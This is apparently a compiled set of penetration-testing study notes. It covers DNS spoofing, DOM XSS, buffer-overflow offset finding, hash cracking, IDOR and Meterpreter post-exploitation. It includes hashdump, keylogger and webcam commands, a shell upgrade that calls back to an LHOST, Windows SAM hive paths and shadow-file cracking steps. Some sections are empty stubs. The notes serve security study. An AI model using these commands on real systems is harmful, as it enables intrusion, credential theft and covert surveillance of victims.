## Directory Traversal Attack

When the attacker is able to read files on the filesystem.

Differs from LFI in the aspect that LFI can execute code, while a Directory Traversal Attack cannot.

--------------------------------------------------------------------------------
/dns-spoofing.md:
--------------------------------------------------------------------------------
# DNS-spoofing

This attack can also be called DNS cache poisoning.
This attack is also performed on an already compromised network. It is pretty much like ARP-spoofing. But instead of relaying traffic we are directing the user to visit a fake website that we have set up.

We set up a webpage that is a clone of facebook.com.
We intercept the DNS traffic, and every time the target sends a request to a DNS server to resolve facebook.com we intercept that request and direct the user to our clone.
--------------------------------------------------------------------------------
/dns_basics.md:
--------------------------------------------------------------------------------
# DNS Basics


This is the best article I have found about how the DNS system works. From the highest to the lowest level.

[An introduction to dns-terminology components and concepts](https://www.digitalocean.com/community/tutorials/an-introduction-to-dns-terminology-components-and-concepts)

Before we begin to look at the specific techniques that exist to find subdomains, let's try to understand what subdomains are and how they work.

**A records**

A stands for **address**.

The A record maps a name to one or more IP addresses, when the IPs are known and stable.
So that would be 123.244.223.222 => example.com

**AAAA** - points to an IPv6 address

**CNAME**

The CNAME record connects a name to another name. An example of that would be:

```
www.example.com,CNAME,www.example.com.cdn.cloudflare.net.
```

Another example: if you have the domains mail.example.com and webmail.example.com, you can have webmail.example.com point to mail.example.com. So anyone visiting webmail.example.com will see the same thing as mail.example.com. It will NOT redirect you. It just shows you the same content.

Another typical usage of CNAME is to link www.example.com to example.com.

CNAME is quite convenient, because if you change the A record (the IP address) you don't need to change the other subdomains, like ftp.example.com or www.example.com, since they both point to example.com, which is an A record and points directly to the IP.

Another note.
If foo.example.com points to bar.example.com, that means that bar.example.com is the CNAME (Canonical/real/actual Name) of foo.example.com.



**Alias**

Kind of like CNAME in that it points to another name, not an IP.

**MX - Mail exchange**

https://en.wikipedia.org/wiki/MX_record

--------------------------------------------------------------------------------
/dns_zone_transfer_attack.md:
--------------------------------------------------------------------------------
# DNS Zone Transfer Attack

Sometimes DNS servers are misconfigured. The DNS server contains a zone file which it uses to replicate the map of a domain. They should be configured so that only the replicating DNS server can access it, but sometimes it is misconfigured so anyone can request the zone file, and thereby receive the whole list of subdomains. This can be done the following way:


To do this we first need to figure out which DNS servers a domain has.

```
host -t ns wikipedia.com
```

```
host -l wikipedia.com ns1.wikipedia.com
```

This can also be done with tools such as dnsrecon and dnsenum.

https://security.stackexchange.com/questions/10452/dns-zone-transfer-attack
--------------------------------------------------------------------------------
/dom-based-xss.md:
--------------------------------------------------------------------------------
## DOM-based XSS

In DOM-based XSS the malicious code is never sent to the server. The injection point is somewhere that JavaScript has access to.

The typical example of how this works is with URLs.

The user is able to control the URL with the help of the hash symbol `#`. If we add that symbol to a URL the browser will not include the characters that come after it in the request to the server.

```
https://example.com/#this_is_not_sent_to_server
```

However, the complete URL is included in DOM objects.

```
document.URL
# will generate this output: https://example.com/#this_is_not_sent_to_server
```

### Source

So in order to inject and execute a DOM-based XSS we need an injection point (called source) and a point of execution (called sink).

In the example above `document.URL` is our source. Examples of other sources are:

```
document.URL
document.documentURI
document.URLUnencoded (IE 5.5 or later Only)
document.baseURI
location
location.href
location.search
location.hash
location.pathname

window.name
document.referrer
```

### Sinks

```
eval
setTimeout
setInterval
setImmediate
execScript
crypto.generateCRMFRequest
ScriptElement.src
ScriptElement.text
ScriptElement.textContent
ScriptElement.innerText
anyTag.onEventName
```


### Finding it

To find DOM-based XSS you will need to check out the code.

If the JavaScript code is bundled and minified you can use js_beautify to make it readable again.

```
sudo apt-get install libjavascript-beautifier-perl
# then invoke js_beautify
```


## References

[https://github.com/wisec/domxsswiki/wiki/location,-documentURI-and-URL-sources](https://github.com/wisec/domxsswiki/wiki/location,-documentURI-and-URL-sources)

--------------------------------------------------------------------------------
/editing-exploits.md:
--------------------------------------------------------------------------------
# Editing exploits

We often find exploits that do not work out of the box.
Typical problems we encounter are:
- Payload needs to be changed
- Return address is incorrect

--------------------------------------------------------------------------------
/email_harvesting.md:
--------------------------------------------------------------------------------
# Identifying People

We want to find out who is connected to the target. That can be site administrators, employees, owners, mods. Maybe one of the administrators has posted in a forum with their email, or in a newsgroup or somewhere else. Those posts could contain useful data about the stack or help us develop a network diagram. We might also need to use social engineering.

In order to find people we might use the following sources:

* The company website
* Social media (LinkedIn, Facebook, Twitter etc)
* Forums and newsgroups
* Metadata from documents

### Company Website

This is pretty obvious. Just look around on the website. Or download it. Or spider it with Burp and then search the result.

Make sure to check out the blog. There you might have employees writing blog posts under their name.

### Social Media

```
site:twitter.com companyname
site:linkedin.com companyname
site:facebook.com companyname
```

### Metadata From Documents

You find some documents and then run exiftool on them to see if there is any interesting metadata.

```
site:example.com filetype:pdf
```

## Email Harvesting

theharvester - I have not had luck with this

```
theharvester -d example.com -l 500 -b all
```

## Check if emails have been pwned before

[https://haveibeenpwned.com](https://haveibeenpwned.com)

# Users

social-searcher.com

Reddit
Snoopsnoo

--------------------------------------------------------------------------------
/escaping_restricted_shell.md:
--------------------------------------------------------------------------------
# Escaping Restricted Shell

Some sysadmins don't want their users to have access to all commands, so they get a restricted shell. If the hacker gets access to a user with a restricted shell we need to be able to break out of that, escape it, in order to have more power.

Many Linux distros include rshell, which is a restricted shell.

To access the restricted shell you can do this:

```
sh -r
rsh

rbash
bash -r
bash --restricted

rksh
ksh -r
```

http://securebean.blogspot.cl/2014/05/escaping-restricted-shell_3.html?view=sidebar
http://pen-testing.sans.org/blog/pen-testing/2012/06/06/escaping-restricted-linux-shells
--------------------------------------------------------------------------------
/example_of_company_architecture.md:
--------------------------------------------------------------------------------
# Example of company architecture

https://www.reddit.com/r/AskNetsec/comments/4p7onl/gaining_initial_access_in_realworld_pentesting/

![Map](dGaQO6Y.png)
--------------------------------------------------------------------------------
/examplesXSS.md:
--------------------------------------------------------------------------------
# Examples

This is a good list:

https://www.linkedin.com/pulse/20140812222156-79939846-xss-vectors-you-may-need-as-a-pen-tester

## No security
``


Imagine that the server sanitizes ``
``

### Using the IMG-tag
```

```


### Onmouseover
```
d
```
--------------------------------------------------------------------------------
/exploit-examples_2.md:
--------------------------------------------------------------------------------
# Exploit-examples 2


So this whole section continues to be a chaos. So instead of repairing the broken chapters I am just going to start writing anew, and see if I can make it make more sense this time.

You have an application that you know is vulnerable to a buffer overflow. These are the steps to exploit it:

- Find the buffer overflow
- Find the exact offset
- Identify bad characters


## Find the buffer overflow

First we need to find where it is. We can do that by progressively adding more bytes and then attaching the process to a debugger (Immunity, Olly). Then we just probe the application with more and more bytes until we reach the limit where the application crashes.

## Find the exact offset

Now we need to know exactly where the offset is. We can do that using some Metasploit tools. We create a fuzzing payload like this


```
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 700
```

This will return something like this:

```
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3A...
```

So we modify our exploit script and add the fuzzer payload as our payload. We run it again and look for where it crashes in our debugger.

We take that hex and check with another Metasploit tool to know the exact offset.
Like this

```
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438 -l 700
# Stdout
[*] Exact match at offset 605
```

So now we know the exact offset. This means that we know where we have the EIP. We can now modify our exploit script to place a unique string in the EIP to make sure everything is working as expected.

## Identify bad characters

Now it is time to start developing our malicious payload. But before we do that we need to know what bad characters we have, so we can avoid them. We can do that by sending all characters to the buffer and seeing how the application reacts to them.

Here are all characters, from **\x01** to **\xff**. If the application removes one of them or something like that we know it is a bad character.

```
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
```

Common bad characters are
**\x00** - Null byte
**\x0a** - New line
**\x0d** - Carriage return

4.
--------------------------------------------------------------------------------
/exploiting.md:
--------------------------------------------------------------------------------
# Exploiting

So you have done your homework, done your vulnerability analysis and found several vulnerabilities. Now it is time to exploit them.

Before you start writing your own exploits you should of course check if there are some already written.

Do not just grab any exploit on the internetz. If it contains shellcode it might be you that is getting hacked. On Exploit-DB and SecurityFocus they vet the exploits before they are published so it is at least a bit more secure. But be paranoid, and don't trust shellcode or code that you didn't write.

[Exploit-DB](https://www.exploit-db.com)
[Security Focus](http://www.securityfocus.com/)

--------------------------------------------------------------------------------
/exploits.md:
--------------------------------------------------------------------------------
# Exploits

Once you have chosen an exploit you can check which targets the exploit supports by writing

```
show targets
```

Show compatible payloads
```
show payloads
```

```
show options
```

```
show advanced
```


```
show evasion
```

--------------------------------------------------------------------------------
/exposed_version_control.md:
--------------------------------------------------------------------------------
# Exposed Version Control

If you, using dirb or nikto, find a version control directory exposed, you can use it like this.

```
git clone http://example.com/.git
```

https://en.internetwache.org/dont-publicly-expose-git-or-how-we-downloaded-your-websites-sourcecode-an-analysis-of-alexas-1m-28-07-2015/

--------------------------------------------------------------------------------
/failure-to-restrict-url-access.md:
--------------------------------------------------------------------------------
## Failure to Restrict URL Access

This basically means that a normal user has access to areas on a webpage that should only be accessible to an administrator, or another user. This can happen when the website hides functionality from its users instead of restricting it with authentication. So if the user finds out the hidden URL the user will be able to access that part of the website.

### How to exploit it

It kind of depends on what access you have to the service. If you have access to an installation you can just create a list of all URLs that the admin account, or low-privilege accounts, have access to. And then check if non-authenticated users can access those pages.

If you are testing it black-box style you can force-browse it.

### References

https://www.owasp.org/index.php/Top_10_2010-A8-Failure_to_Restrict_URL_Access

--------------------------------------------------------------------------------
/find_subdomains.md:
--------------------------------------------------------------------------------
# Find Subdomains


Finding subdomains is fundamental. The more subdomains you find, the bigger attack surface you have. Which means a bigger possibility of success.

For now this seems to be a very comprehensive list of tools to find subdomains.
https://blog.bugcrowd.com/discovering-subdomains

--------------------------------------------------------------------------------
/finding_subdomains.md:
--------------------------------------------------------------------------------
# Find Subdomains


Finding subdomains is fundamental. The more subdomains you find, the bigger attack surface you have. Which means a bigger possibility of success.

For now this seems to be a very comprehensive list of tools to find subdomains.
https://blog.bugcrowd.com/discovering-subdomains

Some tools find some stuff, other tools other stuff. So your best bet is to use a few of them together. Don't forget to brute-force recursively!


### recon-ng

In order to find subdomains we can use the recon-ng framework. It has the same basic structure as Metasploit. You can learn more about this tool in the tools section.

```bash
recon-ng

use recon/domains-hosts/

# This will give you a vast amount of alternatives.

show options

set source cnn.com
```


All these subdomains will be saved in `hosts`, which you can access through `show hosts`.

If some of these subdomains are not given IPs automatically you can just run

```
use recon/hosts-hosts/resolve
run
```

And it will resolve all the hosts stored in `hosts`.


### Google Dorks

Using Google we can also find subdomains.

This will only give us the subdomains of a site.

`site:msn.com -site:www.msn.com`

`site:*.nextcloud.com`

To exclude a specific subdomain you can do this:

`site:*.nextcloud.com -site:help.nextcloud.com`

### subbrute.py

The basic command is like this

`./subbrute.py -p cnn.com`

https://github.com/TheRook/subbrute

### Knock

I haven't tested this yet.
https://github.com/guelfoweb/knock


### Being smart

You also have to look at what kind of system the target has. Some web apps give their clients their own subdomains. Like GitHub.

Check out the homepage.
Often companies brag about their clients. You can use this to guess the subdomains of some clients.


### Reverse DNS lookup

If you manage to figure out the IP range that the target owns (see the section about nmap below), you can see which machines are online. And then you can run a script to find out the domain names of those machines. That way you might find something new.

The text file onlyIps.txt is a text file with one IP address on each line.

```
#!/bin/bash

# Reverse-resolve every address listed in onlyIps.txt, one per line
while read p; do
  echo "$p"
  host "$p"
done < onlyIps.txt
```

```
> wordlist2.txt
```

## Create a custom wordlist



**Html2dic - Build dictionary from html**

You can build a dictionary from an HTML page.

```
curl http://example.com > example.txt
```

Then run:

```
html2dic example.txt
```

Then you should probably remove duplicates.


**Cewl - Spider and build dictionary**

```
cewl -w createWordlist.txt https://www.example.com
```

Add minimum password length:

```
cewl -w createWordlist.txt -m 6 https://www.example.com
```

**Improve the custom wordlist**

As we all know, few passwords are just simple words. Many use numbers and special characters. To improve our password list we can use John the Ripper.
We can input our own rules, or we can just use the standard John the Ripper rules

```
john --wordlist=wordlist.txt --rules --stdout > wordlist-modified.txt
```


## References

http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-4-creating-custom-wordlist-with-crunch-0156817/

--------------------------------------------------------------------------------
/getting_meterpreter_shell.md:
--------------------------------------------------------------------------------
# Meterpreter shell for post-exploitation

By now you probably have some kind of shell to the target. If it is not a Meterpreter shell you should probably try to turn the current shell into a Meterpreter shell, since it makes a lot of tools available really easily.

So just create a Meterpreter shell with msfvenom or something like that. Maybe a PHP shell. Or whatever you have access to. Then you just fire that script and get your Meterpreter shell. Check out the chapter Exploiting/Msfvenom for more about creating payloads.


## Basics

List all commands
```
help
```

Get help about a specific command
```
help upload
```

### Sessions
So first some basics. You can put the shell into a background job with the command `background`. This might be useful if you have several shells going at the same time. Or if you want to move to a specific directory to upload or download some files.

List background sessions
```
sessions -l
```

Connect back to a background session
```
sessions -i 1
```

Upload and download files.
```
upload
download
```


## Scripts


### Migrate

A really common and useful script that is built into Metasploit is the migrate script.
If you get the shell through some kind of exploit that crashes a program, the user might shut down that program and it will close your session. So you need to migrate your session to another process. You can do that with the `migrate` script.

First run this command to output all processes

```
ps
```

Now you choose one and run
```
run migrate -p 1327
```
Where the argument to `-p` is the PID of the process.


## Post modules

There are tons of modules specifically created for post-exploitation. They can be found with

```
use post/
```

### Upgrade a normal shell to Meterpreter

There is a point in doing stuff through Metasploit. For example, if you find an exploit that does not have Meterpreter available as a payload you can just start a normal shell and then upgrade it. To do that you do the following:

First you generate a shell through Metasploit, either through a specific exploit or through an msfvenom shell that you upload. Now that you have a normal shell it is time to upgrade it to a Meterpreter shell.

First we have to leave the shell but without killing it. So we do

```
Ctrl-Z
Background session 2? [y/N] y
```

Now we have that shell running in the background, and you can see it with

```
sessions
#or
sessions -l
```

And you can connect to it again with

```
sessions -i 1
```

Or whatever the number of the session is.

So now we have the shell running in the background. It is time to upgrade

```
use post/multi/manage/shell_to_meterpreter
set LHOST 192.168.1.102
set session 1
exploit
```

Now Metasploit will create a new session with Meterpreter that will be available to you.
--------------------------------------------------------------------------------
/google_hacking.md:
--------------------------------------------------------------------------------
# Search Engine Discovery

Search engines can be very useful for finding information about the target. Search engines can be used for two things:

* Finding sensitive information on the domain that you are attacking
* Finding sensitive information about the company and its employees on other parts of the internet. Like forums, newsgroups etc.


Remember that the world is bigger than Google. So test out the other search engines.

Baidu, binsearch.info, Bing, DuckDuckGo, ixquick/Startpage, Shodan, PunkSpider


Google is a good tool to learn more about a website.

## Finding specific filetypes

```
filetype:pdf
```

### Search within web address

```
site:example.com myword
```

### Find in URL

```
inurl:test.com
```

### Wild cards

You can use the asterisk as a wildcard:

```
*
```

Example:

```
"I've been * for a heart"
```

This will return answers where * is anything.

## Exclude words

```
-
```

The dash excludes a specific word.

This query searches for pages that use the word bananasplit but not the word banana.

```
-banana bananasplit
```

### Cached version

So if a website has been taken down you can still find the cached version, from the last time Google visited the site

```
cache:website.com
```

[https://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf](https://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf)

## Examples

Find login pages on sites that use the ending .bo. For Bolivia.

```
site:bo inurl:admin.php
```

## More

Here are some more

Great guide for Google dorks
[https://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf](https://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf)

[http://www.googleguide.com/advanced_operators_reference.html](http://www.googleguide.com/advanced_operators_reference.html)

[http://www.searchcommands.com/](http://www.searchcommands.com/)

[https://support.google.com/websearch/answer/2466433?hl=en](https://support.google.com/websearch/answer/2466433?hl=en)

[https://www.exploit-db.com/google-hacking-database/](https://www.exploit-db.com/google-hacking-database/)

--------------------------------------------------------------------------------
/hashcat.md:
--------------------------------------------------------------------------------
# Hashcat

--------------------------------------------------------------------------------
/host-header-attack.md:
--------------------------------------------------------------------------------
# Host Header Attack

It is common for a web server to host several applications. These applications are distinguished based on the domain name. So how would a web server know which page a user wants to visit? The answer is the Host header. In the Host header the domain name is specified.


### Password reset

The Host header can sometimes be parsed in the code and used for creating links. So if the Host header is used for creating the password reset link it is possible for an attacker to steal the reset token. The attacker just needs to enter the victim's email address in the password reset field, then intercept the request and change the Host header to some address that the attacker controls.
When the victim receives the password reset link they will click on it, which will direct them to the attacker's site, which enables the attacker to steal the reset token, since it will be stored in the URL that the user clicks.


## Web Cache Poisoning


--------------------------------------------------------------------------------
/html-injection.md:
--------------------------------------------------------------------------------
## HTML-Injection

This attack is really similar to Cross-Site Scripting attacks.

What we can do:

* Create a fake login page that tricks the user to log in again, but the POST is sent to a server that the attacker controls, which can thereby steal the credentials of the user.
* Inject JavaScript.

### Injecting Javascript

JavaScript can be injected into HTML tags, which can be used to steal cookies and other things.

### Injecting HTML

The attacker can inject HTML forms that trick the user into giving up sensitive data.

See event handlers for more ways: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Event_Handlers

```

```


--------------------------------------------------------------------------------
/identify_hash_and_crack_it.md:
--------------------------------------------------------------------------------
# Offline password cracking

We might find passwords or other credentials in databases. These are often hashed, so we need to first identify which hash it is and then try to crack it. The first step is to identify the hash algorithm that was used to hash the password.

## Identify hash

There are generally speaking three pieces of data we can use to identify a hash.
- The length of the hash
- The character set
- Any special characters

In order to identify a hash we can either use specialized tools that analyze the hash and then return a guess on which algorithm it is. An easier way is of course to just look in the documentation of the software where you found the hashes. It usually says in the documentation or the source code which type of hash is being used.


In Kali we can use `hash-identifier` or `hashid`:

```
hash-identifier
hashid
```

Or try these online services:

http://www.onlinehashcrack.com/hash-identification.php

https://md5hashing.net/hash_type_checker


## Cracking the hash

Okay so now we know what hash it is, let's get cracking.

If you want to try out the functionality of hashcat or John the Ripper you can find example hashes here: http://openwall.info/wiki/john/sample-hashes.

### Hashcat

Look for the specific type of hash you want to crack in the list produced by the following command:

```
hashcat --help
```

My hash was an Apache MD5, so I will use the corresponding code for it, `1600`

`-a 0` - straight (dictionary) attack

`-o found.txt` - where the cracked hash is written

`admin.hash` - the file containing the hash you want to crack

`wordlist.txt` - the wordlist we use

`-r /usr/share/hashcat/rules/rockyou-30000.rule` - the rule file applied to each wordlist entry

```
hashcat -m 1600 -a 0 -o found.txt admin.hash wordlist.txt -r /usr/share/hashcat/rules/rockyou-30000.rule
```

### John the ripper

So this is how you usually crack passwords with John

```
john --wordlist=wordlist.txt dump.txt
```

If you do not find the password you can add the John rules, which add numbers and such things to each password.

```
john --rules --wordlist=wordlist.txt dump.txt
```

#### Linux shadow password

First you need to combine the passwd file with the shadow file using the `unshadow` program, so john sees both the usernames and the hashes:

```
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=wordlist.txt unshadowed.txt
```

### Rainbow tables

A rainbow table is a precomputed table of hashes (stored compactly as hash chains). Instead of hashing every candidate word at cracking time, the hashing is done once up front, and cracking becomes a lookup of the target hash in the table. Building the table takes a long time, but each lookup is fast. Rainbow tables only work against unsalted hashes (such as LM, NTLM or raw MD5); a per-password salt makes the precomputation useless, because the table would have to be rebuilt for every salt.

## Using Online Tools

### findmyhash

You can use `findmyhash`. Here is an example of how to use it:

```
findmyhash LM -h 6c3d4c343f999422aad3b435b51404ee:bcd477bfdb45435a34c6a38403ca4364
```

### Cracking

Crackstation
https://crackstation.net/

Hashkiller
https://hashkiller.co.uk/

Google the hash.
Search pastebin.

## Windows

If you find a local file inclusion vulnerability you might be able to retrieve two fundamental files with it: the `SYSTEM` registry hive and the `SAM` registry hive. These two hives are all we need to get the machine's password hashes (the `SYSTEM` hive holds the boot key needed to decrypt the hashes stored in `SAM`). These files can be found in several different locations in Windows.
Here they are:

```
%SYSTEMROOT% is usually C:\Windows
%SYSTEMROOT%\repair\SAM
windows\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM

The SYSTEM hive can be found here
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system
```

The live copies under `%SYSTEMROOT%\System32\config\` are locked while Windows is running, which is why the `repair` and `RegBack` backups are the ones worth trying through a file-read vulnerability (on recent Windows 10 builds the `RegBack` copies are empty by default). If you manage to get your hands on both files you can extract the password hashes like this:

```
pwdump system sam
```

-------------------------------------------------------------------------------- /identifying-technology-stack.md: --------------------------------------------------------------------------------
## Identifying Technology Stack

* Job openings

-------------------------------------------------------------------------------- /immunity_debugger.md: --------------------------------------------------------------------------------
# Immunity Debugger

Immunity Debugger is a great GUI and CLI tool to use for exploit development.

-------------------------------------------------------------------------------- /insecure-direct-object-reference-idor.md: --------------------------------------------------------------------------------
## Insecure Direct Object Reference

The vulnerability arises when the application uses user-supplied data to look up an object (a user, a file, a record) directly, without checking that the requesting user is authorized to access that object.

The classic example of this would be something like the following:

```
http://foo.bar/changepassword?user=someuser
```

Imagine that you know another user's username; then you can just change the `user` parameter and be able to change the password for that user. The data you can access can be anything: private comments, messages, images, user data.

### How to discover

If you have access to the source code that is an easy way to do it. Check the sections where restricted data is presented, and see if there is any access control in that code, i.e. whether the object's owner is compared against the logged-in user. Without source, take an identifier you legitimately own, log in as a second account and replay the same request with the first account's identifier.
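The password-change handler above, written out as an added example (not code from the original guide): the IDOR-vulnerable version beside its fixed version, plus the discovery check described under "How to discover". The in-memory user table, the `Session` object and the function names are assumptions made for this illustration, not any real application's API.

```python
"""Added example (not from the original guide): an IDOR-vulnerable
password-change handler next to its fixed version.  USERS, Session and
the handler names are assumptions made for this illustration."""

from dataclasses import dataclass

# Constructed sample data: two users and their (fake) stored passwords.
USERS = {"alice": "alice-pw", "bob": "bob-pw"}


@dataclass
class Session:
    """Who is logged in for this request (set by the server, not the client)."""
    username: str


class Forbidden(Exception):
    """Raised when the requester does not own the target object."""


def change_password_vulnerable(session: Session, params: dict) -> str:
    """Mirrors /changepassword?user=someuser: the target user comes from the
    request and is never compared with the session owner."""
    target = params["user"]                 # attacker-controlled
    USERS[target] = params["new_password"]
    return target


def change_password_fixed(session: Session, params: dict) -> str:
    """Same handler with the access-control check that IDOR lacks."""
    target = params["user"]
    if target != session.username:          # object owner must match requester
        raise Forbidden(f"{session.username} may not change {target}'s password")
    USERS[target] = params["new_password"]
    return target


def stored_password(user: str) -> str:
    """Read back the sample store so the effect of a request is visible."""
    return USERS[user]


def is_idor_vulnerable(handler) -> bool:
    """Discovery check: as alice, try to change bob's password through
    `handler`.  True means the cross-user request was accepted."""
    before = USERS["bob"]
    try:
        handler(Session("alice"), {"user": "bob", "new_password": "probe"})
    except Forbidden:
        return False
    changed = USERS["bob"] != before
    USERS["bob"] = before                   # restore the sample data
    return changed


if __name__ == "__main__":
    print("vulnerable handler accepts cross-user change:",
          is_idor_vulnerable(change_password_vulnerable))
    print("fixed handler accepts cross-user change:",
          is_idor_vulnerable(change_password_fixed))
```

The fix is deliberately a comparison against the server-side session, not against another request parameter: anything the client sends can be swapped just like `user` was.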
18 | 19 | 20 | 21 | ### Examples 22 | 23 | 24 | 25 | https://hackerone.com/reports/53858 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /java_applet.md: -------------------------------------------------------------------------------- 1 | # Java applet 2 | 3 | Okay this is pretty outdated. Chrome does not support java by default anymore. But other browsers do, and a lot of companies use java. 4 | 5 | This is an attack that is based on attacking the user and not necessarily the software. We want the user to execute malicious code on his/her computer. 6 | 7 | -------------------------------------------------------------------------------- /lead_to_compromise.md: -------------------------------------------------------------------------------- 1 | # Attacking the System 2 | 3 | I have divided the web-vulnerabilites into two categories: **Attacking the System** and **Attacking the User**. I know this might seem like a pretty weird categorization, but I think it make sense. So in this chapter we will look at vulnerabilities that primarily focus on the webserver, and not the visiting users. 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /linux.md: -------------------------------------------------------------------------------- 1 | # Linux 2 | 3 | Linux was first released in September 17, 1991 by Linus Torvalds. Strictly speaking Linux is just the kernel in the GNU/Linux operating system. Linux is the most installed OS in the world, that is mainly due to the fact that android use Linux as its OS. It is leading in pretty much all markets except for the desktop-market. 4 | 5 | From a infosec perspective there are two reasons we should learn Linux. The first is that the majority of all servers in the world is running on Linux. And if we want to hack those servers we of course have to understand how they work. 
The second reason is that the vast majority of all hacking-tools are only available on Linux. 6 | 7 | So in this chapter we are going to look at bit at some basic commands and basics of Linux. Of course your can write quite a few books about Linux, so this tiny little introduction is just way to get you started. And also, I am just a beginner myself so I am just writing stuff that I myself need to learn. 8 | 9 | Although there is only one Linux Kernel there are many Linux Distributions, that is: different versions. That is because the GNU/Linux OS is a mix of GNU software and the Linux Kernel. The GNU/Linux OS can be packaged in a million different ways, with different software preinstalled, with different configurations, with different Graphical User Interface \(GUI\). The fact that you can configure the OS however you like has given rise to the many different versions. These different versions are usually called **distros**. There are hundreds of different distros. Some common ones are: Ubuntu, Debian, Redhat, CentOS and Arch. 10 | 11 | So you probably wonder what the main differences are. Here is a list of some differences: 12 | 13 | * Package management program. 14 | * Speed and interval of release 15 | * Desktop environment 16 | * Default GUI 17 | * Community 18 | * Compilation of the Linux Kernel 19 | 20 | So as you can see depending on the users needs you can choose the distro that fits you best. Some people want to have bleeding-edge \(the latest updates - although a bit more unstable\) and others prefer stability. Some people want a distro with higher degree of security. Others want a distro with only free software, others want distros specially made for kids, or for education, or for scientists. One distro that is common among pentesters is Kali Linux. It comes preinstalled with hundreds of different pentesting-related tools. It might not be the best distro for everyday use. But for pentesting is is really convenient. 
Of course you could just download the programs to your non-kali distro as you go along. But it might be just an unneccesary hassle for you. 21 | 22 | -------------------------------------------------------------------------------- /littearature.md: -------------------------------------------------------------------------------- 1 | # Literature 2 | 3 | 4 | ## Zines 5 | 6 | 7 | **2600: The Hacker Quarterly** 8 | 9 | https://www.2600.com/ 10 | 11 | **Go null yourself** 12 | 13 | http://web.textfiles.com/ezines/GONULLYOURSELF/gonullyourself1.txt 14 | 15 | **Hacking with Kali** 16 | 17 | https://archive.org/stream/HackingWithKali/Hacking%20with%20Kali_djvu.txt 18 | 19 | 20 | ## Books 21 | 22 | **Hacking - The Art of Exploitation** 23 | 24 | **Pentesting - A Hands-On Introduction to Hacking by Georgia Weidman** -------------------------------------------------------------------------------- /loot.md: -------------------------------------------------------------------------------- 1 | # Loot and Enumerate 2 | 3 | After you have gained access to a machine you must loot it. This is useful in order to be able to pivot into other machine. 4 | 5 | If you are on a network with other machines that you still haven't owned, it might be useful to take a tcp-dump from the machine you have owned. So that you can inspect the traffic between that machine and the other machines on the network. This might be helpful when attacking the other machines. 6 | 7 | So after we have exploited a machine we want to use that machine to learn as much about the network as possible. To be able to map the entire network. We want to know about switches, firewalls, routers, other computers, server, etc. We want to know what ports are open, their operating systems. 8 | 9 | We can start getting an understanding of the network by taking a tcp-dump. 10 | 11 | We also want to look for password that might be reused on other machines, and sensitive information found in databases. 
Information about the users might be interesting in order to run social engineering attacks against other users on the network.

-------------------------------------------------------------------------------- /loot_windows_-_for_credentials_and_other_stuff.md: --------------------------------------------------------------------------------
# Loot Windows

## Meterpreter

If you have a meterpreter shell you are able to do a lot of things with very little effort. If you do not have a meterpreter shell you can always create a payload with msfvenom (an elf, exe or other format) to upgrade your shell.

Show help for a command with `-h` (and `help` lists all commands):

```
-h
```

**Dump Windows hashes for further analysis**

```
hashdump
```

Keylogger

```
keyscan_start
keyscan_dump
keyscan_stop
```

**Mic and webcam commands**

```
record_mic      Record audio from the default microphone for X seconds
webcam_chat     Start a video chat
webcam_list     List webcams
webcam_snap     Take a snapshot from the specified webcam
webcam_stream   Play a video stream from the specified webcam
```

## Dumping passwords and hashes on Windows

This most likely requires administrative rights, which is why the chapter is found here and not in priv-esc. Once you have a hash you can move on to the Password Cracking chapter, where we discuss different techniques for cracking hashes.

